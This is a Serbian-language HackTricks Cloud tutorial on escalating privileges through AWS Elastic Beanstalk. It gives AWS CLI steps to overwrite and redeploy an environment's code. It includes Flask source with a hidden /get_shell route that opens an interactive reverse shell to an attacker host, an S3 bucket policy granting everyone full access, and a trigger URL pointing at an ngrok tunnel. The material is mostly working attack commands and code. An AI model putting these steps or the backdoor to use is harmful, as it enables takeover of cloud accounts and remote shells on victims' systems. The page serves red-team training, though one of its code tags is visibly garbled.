Serbian - Ht Cloud
HackTricks Training Twitter Linkedin Sponsor

AWS - Elastic Beanstalk Privesc

Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!

Drugi načini podrške HackTricks-u:

Elastic Beanstalk

Više informacija o Elastic Beanstalk-u u:

pageAWS - Elastic Beanstalk Enum

Da biste izvršili osetljive akcije u Beanstalk-u, moraćete imati mnogo osetljivih dozvola u mnogim različitim servisima. Možete proveriti na primer dozvole date za arn:aws:iam::aws:policy/AdministratorAccess-AWSElasticBeanstalk

elasticbeanstalk:RebuildEnvironment, dozvole za pisanje u S3 i mnoge druge

Sa dozvolama za pisanje u S3 bucket-u koji sadrži kôd okruženja i dozvolama za ponovnu izgradnju aplikacije (potrebno je elasticbeanstalk:RebuildEnvironment i još nekoliko povezanih sa S3, EC2 i Cloudformation), možete izmeniti kôd, ponovo izgraditi aplikaciju i sledeći put kada pristupite aplikaciji, ona će izvršiti vaš novi kôd, omogućavajući napadaču da ugrozi aplikaciju i IAM ulogu povezanu sa njom.

# Create folder
mkdir elasticbeanstalk-eu-west-1-947247140022
cd elasticbeanstalk-eu-west-1-947247140022
# Download code
aws s3 sync s3://elasticbeanstalk-eu-west-1-947247140022 .
# Change code
unzip 1692777270420-aws-flask-app.zip
zip 1692777270420-aws-flask-app.zip <files to zip>
# Upload code
aws s3 cp 1692777270420-aws-flask-app.zip s3://elasticbeanstalk-eu-west-1-947247140022/1692777270420-aws-flask-app.zip
# Rebuild env
aws elasticbeanstalk rebuild-environment --environment-name "env-name"

elasticbeanstalk:CreateApplication, elasticbeanstalk:CreateEnvironment, elasticbeanstalk:CreateApplicationVersion, elasticbeanstalk:UpdateEnvironment, iam:PassRole, i još...

Pomenute, kao i nekoliko S3, EC2, cloudformation ,autoscaling i elasticloadbalancing dozvola su neophodne za kreiranje osnovnog scenarija Elastic Beanstalk-a od nule.

  • Kreiraj AWS Elastic Beanstalk aplikaciju:

aws elasticbeanstalk create-application --application-name MyApp
aws elasticbeanstalk create-environment --application-name MyApp --environment-name MyEnv --solution-stack-name "64bit Amazon Linux 2 v3.4.2 running Python 3.8" --option-settings Namespace=aws:autoscaling:launchconfiguration,OptionName=IamInstanceProfile,Value=aws-elasticbeanstalk-ec2-role

Ako je okolina već kreirana i ne želite da kreirate novu, možete jednostavno ažurirati postojeću.

  • Spakujte svoj aplikacioni kod i zavisnosti u ZIP fajl:

zip -r MyApp.zip .

  • Postavite ZIP fajl u S3 bucket:

aws s3 cp MyApp.zip s3://elasticbeanstalk-<region>-<accId>/MyApp.zip

  • Kreirajte verziju aplikacije AWS Elastic Beanstalk-a:

aws elasticbeanstalk create-application-version --application-name MyApp --version-label MyApp-1.0 --source-bundle S3Bucket="elasticbeanstalk-<region>-<accId>",S3Key="MyApp.zip"

  • Implementirajte verziju aplikacije na vaše AWS Elastic Beanstalk okruženje:

aws elasticbeanstalk update-environment --environment-name MyEnv --version-label MyApp-1.0

elasticbeanstalk:CreateApplicationVersion, elasticbeanstalk:UpdateEnvironment, cloudformation:GetTemplate, cloudformation:DescribeStackResources, cloudformation:DescribeStackResource, autoscaling:DescribeAutoScalingGroups, autoscaling:SuspendProcesses, autoscaling:SuspendProcesses

Prvo morate kreirati legitimno Beanstalk okruženje sa kodom koji želite pokrenuti na žrtvi prateći prethodne korake. Potencijalno jednostavan zip koji sadrži ove 2 datoteke:

from flask import Flask, request, jsonify
import subprocess,os, socket

application = Flask(__name__)

@application.errorhandler(404)
def page_not_found(e):
return jsonify('404')

@application.route("/")
def index():
return jsonify('Welcome!')


@application.route("/get_shell")
def search():
host=request.args.get('host')
port=request.args.get('port')
if host and port:
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((host,int(port)))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])
return jsonify('done')

if __name__=="__main__":
application.run()

Kada imate svoje Beanstalk okruženje pokrenuto sa vašim rev šelom, vreme je da ga migrirate na žrtvinom okruženju. Da biste to uradili, morate ažurirati Politiku kante vaše Beanstalk S3 kante tako da žrtva može pristupiti (Imajte na umu da će se time otvoriti kanta za SVAKOGA):

{
"Version": "2008-10-17",
"Statement": [
{
"Sid": "eb-af163bf3-d27b-4712-b795-d1e33e331ca4",
"Effect": "Allow",
"Principal": {
"AWS": "*"
},
"Action": [
"s3:ListBucket",
"s3:ListBucketVersions",
"s3:GetObject",
"s3:GetObjectVersion",
"s3:*"
],
"Resource": [
"arn:aws:s3:::elasticbeanstalk-us-east-1-947247140022",
"arn:aws:s3:::elasticbeanstalk-us-east-1-947247140022/*"
]
},
{
"Sid": "eb-58950a8c-feb6-11e2-89e0-0800277d041b",
"Effect": "Deny",
"Principal": {
"AWS": "*"
},
"Action": "s3:DeleteBucket",
"Resource": "arn:aws:s3:::elasticbeanstalk-us-east-1-947247140022"
}
]
}

{% код препун="wrap" %}

# Use a new --version-label
# Use the bucket from your own account
aws elasticbeanstalk create-application-version --application-name MyApp --version-label MyApp-2.0 --source-bundle S3Bucket="elasticbeanstalk-<region>-<accId>",S3Key="revshell.zip"

# These step needs the extra permissions
aws elasticbeanstalk update-environment --environment-name MyEnv --version-label MyApp-1.0

# To get your rev shell just access the exposed web URL with params such as:
http://myenv.eba-ankaia7k.us-east-1.elasticbeanstalk.com/get_shell?host=0.tcp.eu.ngrok.io&port=13528
Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!

Drugi načini podrške HackTricks-u:

PreviousAWS - EFS PrivescNextAWS - EMR Privesc

Last updated